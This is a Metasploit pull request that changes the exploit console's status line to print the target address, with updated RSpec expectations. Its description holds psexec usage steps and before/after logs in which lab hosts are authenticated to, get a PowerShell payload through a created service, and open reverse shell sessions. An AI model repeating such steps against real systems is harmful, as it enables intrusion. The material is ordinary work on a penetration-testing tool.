### PR TITLE
Fix the printed exploit target

### DIFF
--- a/lib/msf/ui/console/command_dispatcher/exploit.rb
+++ b/lib/msf/ui/console/command_dispatcher/exploit.rb
@@ -187,7 +187,7 @@ class Exploit
         opts["multi"] = false if rhost[:address] == (Rex::Socket.addr_itoa(rhosts_range.ranges.first.stop))
         # Catch the interrupt exception to stop the whole module during exploit
         begin
-          print_status("Exploiting target #{rhost}")
+          print_status("Exploiting target #{rhost[:address]}")
           session = exploit_single(nmod, opts)
         rescue ::Interrupt
           print_status("Stopping exploiting current target #{rhost[:address]}...")

--- a/spec/lib/msf/ui/console/command_dispatcher/exploit_spec.rb
+++ b/spec/lib/msf/ui/console/command_dispatcher/exploit_spec.rb
@@ -295,10 +295,10 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Exploit do
         current_mod.datastore['RHOSTS'] = '192.0.2.1 192.0.2.2'
         subject.cmd_run
         expected_output = [
-          'Exploiting target {:address=>"192.0.2.1", :hostname=>nil}',
+          'Exploiting target 192.0.2.1',
           'Running for target 192.0.2.1:3000 with normalized datastore value 3.5',
           'Cleanup for target 192.0.2.1:3000',
-          'Exploiting target {:address=>"192.0.2.2", :hostname=>nil}',
+          'Exploiting target 192.0.2.2',
           'Running for target 192.0.2.2:3000 with normalized datastore value 3.5',
           'Cleanup for target 192.0.2.2:3000',
           'Exploit completed, but no session was created.'
@@ -313,10 +313,10 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Exploit do
         current_mod.datastore.store('FloatValue', '5.0')
         subject.cmd_run
         expected_output = [
-          'Exploiting target {:address=>"192.0.2.1", :hostname=>nil}',
+          'Exploiting target 192.0.2.1',
           'Running for target 192.0.2.1:3000 with normalized datastore value 5.0',
           'Cleanup for target 192.0.2.1:3000',
-          'Exploiting target {:address=>"192.0.2.2", :hostname=>nil}',
+          'Exploiting target 192.0.2.2',
           'Running for target 192.0.2.2:3000 with normalized datastore value 5.0',
           'Cleanup for target 192.0.2.2:3000',
           'Exploit completed, but no session was created.'
@@ -370,10 +370,10 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Exploit do
         current_mod.datastore['RHOSTS'] = '192.0.2.1 192.0.2.2'
         subject.cmd_run('-j')
         expected_output = [
-          'Exploiting target {:address=>"192.0.2.1", :hostname=>nil}',
+          'Exploiting target 192.0.2.1',
           'Running rex job 0 inline',
           'Running for target 192.0.2.1:3000 with normalized datastore value 3.5',
-          'Exploiting target {:address=>"192.0.2.2", :hostname=>nil}',
+          'Exploiting target 192.0.2.2',
           'Running rex job 1 inline',
           'Running for target 192.0.2.2:3000 with normalized datastore value 3.5',
           'Exploit completed, but no session was created.'


### PR DESCRIPTION
This updates the print status statement used when an exploit module is run to correctly print the address and not the host-hash. I missed this location when I opened PR #14918.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/psexec`
- [ ] Set RHOSTS to two or more valid targets
- [ ] Run `exploit` and see the address printed, not the hostname

## Before
```
msf6 exploit(windows/smb/psexec) > exploit
[*] Exploiting target {:address=>"192.168.159.11", :hostname=>nil}

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Powershell command length: 6396
[*] 192.168.159.11:445 - Executing the payload...
[*] 192.168.159.11:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.11[\svcctl] ...
[*] 192.168.159.11:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.11[\svcctl] ...
[*] 192.168.159.11:445 - Obtaining a service manager handle...
[*] 192.168.159.11:445 - Creating the service...
[+] 192.168.159.11:445 - Successfully created the service
[*] 192.168.159.11:445 - Starting the service...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.11:445 - Removing the service...
[+] 192.168.159.11:445 - Successfully removed the service
[*] 192.168.159.11:445 - Closing service handle...
[*] Exploiting target {:address=>"192.168.159.129", :hostname=>nil}
[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[*] 192.168.159.129:445 - Powershell command length: 6412
[*] 192.168.159.129:445 - Executing the payload...
[*] 192.168.159.129:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.129[\svcctl] ...
[*] 192.168.159.129:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.129[\svcctl] ...
[*] 192.168.159.129:445 - Obtaining a service manager handle...
[*] 192.168.159.129:445 - Creating the service...
[+] 192.168.159.129:445 - Successfully created the service
[*] 192.168.159.129:445 - Starting the service...
[+] 192.168.159.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.129:445 - Removing the service...
[+] 192.168.159.129:445 - Successfully removed the service
[*] 192.168.159.129:445 - Closing service handle...
[*] Powershell session session 1 opened (192.168.159.128:4444 -> 192.168.159.129:55065) at 2021-07-19 15:02:02 -0400
[*] Session 1 created in the background.
msf6 exploit(windows/smb/psexec) >
```

## After
```
msf6 exploit(windows/smb/psexec) > exploit
[*] Exploiting target 192.168.159.11

[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.11:445 - Connecting to the server...
[*] 192.168.159.11:445 - Authenticating to 192.168.159.11:445 as user 'smcintyre'...
[*] 192.168.159.11:445 - Powershell command length: 6391
[*] 192.168.159.11:445 - Executing the payload...
[*] 192.168.159.11:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.11[\svcctl] ...
[*] 192.168.159.11:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.11[\svcctl] ...
[*] 192.168.159.11:445 - Obtaining a service manager handle...
[*] 192.168.159.11:445 - Creating the service...
[+] 192.168.159.11:445 - Successfully created the service
[*] 192.168.159.11:445 - Starting the service...
[+] 192.168.159.11:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.11:445 - Removing the service...
[+] 192.168.159.11:445 - Successfully removed the service
[*] 192.168.159.11:445 - Closing service handle...
[*] Exploiting target 192.168.159.129
[*] Started reverse SSL handler on 192.168.159.128:4444 
[*] 192.168.159.129:445 - Connecting to the server...
[*] 192.168.159.129:445 - Authenticating to 192.168.159.129:445 as user 'smcintyre'...
[*] 192.168.159.129:445 - Powershell command length: 6477
[*] 192.168.159.129:445 - Executing the payload...
[*] 192.168.159.129:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.129[\svcctl] ...
[*] 192.168.159.129:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.129[\svcctl] ...
[*] 192.168.159.129:445 - Obtaining a service manager handle...
[*] 192.168.159.129:445 - Creating the service...
[+] 192.168.159.129:445 - Successfully created the service
[*] 192.168.159.129:445 - Starting the service...
[+] 192.168.159.129:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.129:445 - Removing the service...
[+] 192.168.159.129:445 - Successfully removed the service
[*] 192.168.159.129:445 - Closing service handle...
[*] Powershell session session 2 opened (192.168.159.128:4444 -> 192.168.159.129:55066) at 2021-07-19 15:22:38 -0400
[*] Session 2 created in the background.
msf6 exploit(windows/smb/psexec) > 
```